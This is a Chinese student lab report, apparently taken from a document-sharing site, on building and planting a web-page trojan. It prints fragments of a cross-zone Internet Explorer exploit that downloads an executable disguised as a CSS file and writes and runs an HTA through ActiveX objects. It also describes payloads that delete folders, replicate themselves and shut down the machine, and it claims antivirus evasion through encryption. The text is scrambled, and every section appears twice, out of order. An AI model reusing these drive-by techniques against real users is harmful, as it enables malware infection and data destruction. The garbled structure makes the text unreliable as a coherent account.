木马病毒攻击实验
合集下载
相关主题
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
步骤2改为访问http://localhost/jstrojan/shutdown/index.html
访问以后看你的计算机是否开始注销或者关闭了。
八、实验数据及结果分析:
由于这个脚本是针对IE的漏洞进行设计的,因此对于Windows2000和Windows Xp,这个木马都有效。当然对于已经打了补丁的系统,这个脚本就无能为力了。另外由于已经对木马加密了,所以在一定程度上这个木马脚本还有一定免查杀能力,在某些实验环境下杀毒软件没有任何提示,因为现在的杀毒软件多数都是根据的病毒的特征码来查杀病毒的,而加密以后就不在具有病毒的特征码描述的特征了。
步骤2改为访问http://localhost/jstrojan/breed/index.html
通过命令行查看用户目录,然后到用户目录去看一下,是否有很多可执行文件生成(最多可以达到30000个,我们限制了数量),检查这些可执行文件是否有自我们繁殖功能。
实验三
通过木马关闭计算机
步骤基本和实验一相同
十一、对本实验过程及方法、手段的改进建议:
我们在实验中使用的木马功能其实并不够强大,也就是只有演示功能,其实我们完全可以把远程控制功能加到木马写木马中,这样才能够算是真正意义上的木马,一旦用户访问了我们指定的页面,该计算机就会被我们所控制。
报告评分:分
指导教师签字:
o.Fields("a").Value="这里是HTA的代码"
hta代码在IE临时文件夹内找到bbs003302.css并且改成可执行文件,然后修改成AUTOEXEC.BAT隐藏运行.这里HTA是指HTML Application(关于它的信息请参考Windows的帮助文档)
四、跨域运行HTA的实现.
一、可执行文件的下载.
在index里有一句代码<LINK href="bbs003302.css" rel=stylesheet type=text/css>,这个漏洞也已经很久了,让IE把可执行文件误认为CSS样式表而下载到IE的临时文件目录.其中bbs003302.css就是改了后缀的可执行文件。
=item1 value=",c:\\NTDETECT.hta"></object><OBJECT id="bbs2" type="application/
x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><param name="Command" value="Close"><\/object><script>bbs1.Click();bbs2.Click();<\/script>')
实验报告
学生姓名:
学号:
一、实验室名称:
二、实验项目名称:木马病毒攻击实验
三、实验原理:
基本思想:
在用户浏览网页的时候,在后台把木马程序下载到用户的临时目录,然后利用IE的漏洞把JavaScript文件在用户计算机上写成HTML Application,由于HTML Application具有和普通的可执行文件一样的权限,所以在通过HTML Application调用我们的木马程序,这样我们的程序就被执行了。需要注意的是,普通JavaScript和本地的JavaScript是不一样的,通过IE浏览器执行的脚本有很大的限制,不能够创建文件,不能够对客户的硬盘进行读写。而本地计算机上的JavaScript就不一样了,可以读写文件,可以调用可执行文件,有很大的权限不受任何限制,因此我们在HTML Application中才能够调用木马成功。
九、实验结论:
通过这个实验我们发现现在我们使用的这个Windows操作系统存在严重的安全漏洞。尤其是IE浏览器漏洞特别明显,而且也最严重。
十、总结及心得体会:
通过这个实验我们发现学到了不少的知识,总结如下:
1.理解了网页木马的嵌入技术
2.了解了木马的制作技术
3.进一步熟悉了的编程
3.检查并且记录实验结果
六、实验器材(设备、元器件):
1.Windows操作系统(98以及以上版本都可以)
2.IIS或者Apache
3.IE浏览器
七、实验步骤及操作:
配置Apache或者IIS(我们使用的是Apache)
把我们写的木马拷贝到Apache的DocumentRoot下
实验一:
删除目录
在你的计算机的磁盘D上建立一个目录test
二、跨域漏洞的实现.
这里其实是完全仿照Help Control Local Zone Bypass Exploit中的代码,跨域漏洞的最关键的一句是跨域运行脚本javascript:eval("document.write(\"<SCRIPT src=\\\"bbs003302.gif\\\"\"+String.fromCharCode(62)+
通过浏览器IE访问页面http://localhost/jstrojan/removedir/index.html
用任务管理器查看进程表的变化
查看系统目录下最近建立的可执行,比较是否和我们潜入的可执行文件相同
查看磁盘D上的目录,看它是否还存在,是否被我们的木马程序给删除了
实验二
程序自我繁殖
步骤基本和实验一相同
最后参照Help Control Local Zone Bypass Exploit,实现写入HTA并运行.
document.write('<object id="bbs1" type="application/x-oleobject" classid="clsid:adb880a6-
d8ff-11cf-9377-00aa003b7a11"><param name="Command" value="shortcut"><param name
五、网页代码测试.
供测试的网页代码已经放在文件夹里了,有加密和未加密的两种,测试代码有CHM窗口弹出仅供参考。
四、实验目的:
了解木马病毒的工作原理以及木马的功能,掌握一种制作和种植木马的方法.
五、实验内容:
1.拟订木马制作和种植方案
2.用脚本语言编写一个网页木马,通过图片或Flash动画将它种植到目标计算机上。
\"</SCR\"+\"IPT\"+String.fromCharCode(62))").其实bbs003302.gif其实就是个改了后缀名的JS.
三、JS脚本的原理分析.
因为HTA的权限和可执行文件差不多,所以调用ADODB.Recordset控件写入HTA.
try{o=new ActiveXObject("ADODB.Recordset");o.Fields.Append("a",200,3000);o.Open();o.AddNew();
访问以后看你的计算机是否开始注销或者关闭了。
八、实验数据及结果分析:
由于这个脚本是针对IE的漏洞进行设计的,因此对于Windows2000和Windows Xp,这个木马都有效。当然对于已经打了补丁的系统,这个脚本就无能为力了。另外由于已经对木马加密了,所以在一定程度上这个木马脚本还有一定免查杀能力,在某些实验环境下杀毒软件没有任何提示,因为现在的杀毒软件多数都是根据的病毒的特征码来查杀病毒的,而加密以后就不在具有病毒的特征码描述的特征了。
步骤2改为访问http://localhost/jstrojan/breed/index.html
通过命令行查看用户目录,然后到用户目录去看一下,是否有很多可执行文件生成(最多可以达到30000个,我们限制了数量),检查这些可执行文件是否有自我们繁殖功能。
实验三
通过木马关闭计算机
步骤基本和实验一相同
十一、对本实验过程及方法、手段的改进建议:
我们在实验中使用的木马功能其实并不够强大,也就是只有演示功能,其实我们完全可以把远程控制功能加到木马写木马中,这样才能够算是真正意义上的木马,一旦用户访问了我们指定的页面,该计算机就会被我们所控制。
报告评分:分
指导教师签字:
o.Fields("a").Value="这里是HTA的代码"
hta代码在IE临时文件夹内找到bbs003302.css并且改成可执行文件,然后修改成AUTOEXEC.BAT隐藏运行.这里HTA是指HTML Application(关于它的信息请参考Windows的帮助文档)
四、跨域运行HTA的实现.
一、可执行文件的下载.
在index里有一句代码<LINK href="bbs003302.css" rel=stylesheet type=text/css>,这个漏洞也已经很久了,让IE把可执行文件误认为CSS样式表而下载到IE的临时文件目录.其中bbs003302.css就是改了后缀的可执行文件。
=item1 value=",c:\\NTDETECT.hta"></object><OBJECT id="bbs2" type="application/
x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><param name="Command" value="Close"><\/object><script>bbs1.Click();bbs2.Click();<\/script>')
实验报告
学生姓名:
学号:
一、实验室名称:
二、实验项目名称:木马病毒攻击实验
三、实验原理:
基本思想:
在用户浏览网页的时候,在后台把木马程序下载到用户的临时目录,然后利用IE的漏洞把JavaScript文件在用户计算机上写成HTML Application,由于HTML Application具有和普通的可执行文件一样的权限,所以在通过HTML Application调用我们的木马程序,这样我们的程序就被执行了。需要注意的是,普通JavaScript和本地的JavaScript是不一样的,通过IE浏览器执行的脚本有很大的限制,不能够创建文件,不能够对客户的硬盘进行读写。而本地计算机上的JavaScript就不一样了,可以读写文件,可以调用可执行文件,有很大的权限不受任何限制,因此我们在HTML Application中才能够调用木马成功。
九、实验结论:
通过这个实验我们发现现在我们使用的这个Windows操作系统存在严重的安全漏洞。尤其是IE浏览器漏洞特别明显,而且也最严重。
十、总结及心得体会:
通过这个实验我们发现学到了不少的知识,总结如下:
1.理解了网页木马的嵌入技术
2.了解了木马的制作技术
3.进一步熟悉了的编程
3.检查并且记录实验结果
六、实验器材(设备、元器件):
1.Windows操作系统(98以及以上版本都可以)
2.IIS或者Apache
3.IE浏览器
七、实验步骤及操作:
配置Apache或者IIS(我们使用的是Apache)
把我们写的木马拷贝到Apache的DocumentRoot下
实验一:
删除目录
在你的计算机的磁盘D上建立一个目录test
二、跨域漏洞的实现.
这里其实是完全仿照Help Control Local Zone Bypass Exploit中的代码,跨域漏洞的最关键的一句是跨域运行脚本javascript:eval("document.write(\"<SCRIPT src=\\\"bbs003302.gif\\\"\"+String.fromCharCode(62)+
通过浏览器IE访问页面http://localhost/jstrojan/removedir/index.html
用任务管理器查看进程表的变化
查看系统目录下最近建立的可执行,比较是否和我们潜入的可执行文件相同
查看磁盘D上的目录,看它是否还存在,是否被我们的木马程序给删除了
实验二
程序自我繁殖
步骤基本和实验一相同
最后参照Help Control Local Zone Bypass Exploit,实现写入HTA并运行.
document.write('<object id="bbs1" type="application/x-oleobject" classid="clsid:adb880a6-
d8ff-11cf-9377-00aa003b7a11"><param name="Command" value="shortcut"><param name
五、网页代码测试.
供测试的网页代码已经放在文件夹里了,有加密和未加密的两种,测试代码有CHM窗口弹出仅供参考。
四、实验目的:
了解木马病毒的工作原理以及木马的功能,掌握一种制作和种植木马的方法.
五、实验内容:
1.拟订木马制作和种植方案
2.用脚本语言编写一个网页木马,通过图片或Flash动画将它种植到目标计算机上。
\"</SCR\"+\"IPT\"+String.fromCharCode(62))").其实bbs003302.gif其实就是个改了后缀名的JS.
三、JS脚本的原理分析.
因为HTA的权限和可执行文件差不多,所以调用ADODB.Recordset控件写入HTA.
try{o=new ActiveXObject("ADODB.Recordset");o.Fields.Append("a",200,3000);o.Open();o.AddNew();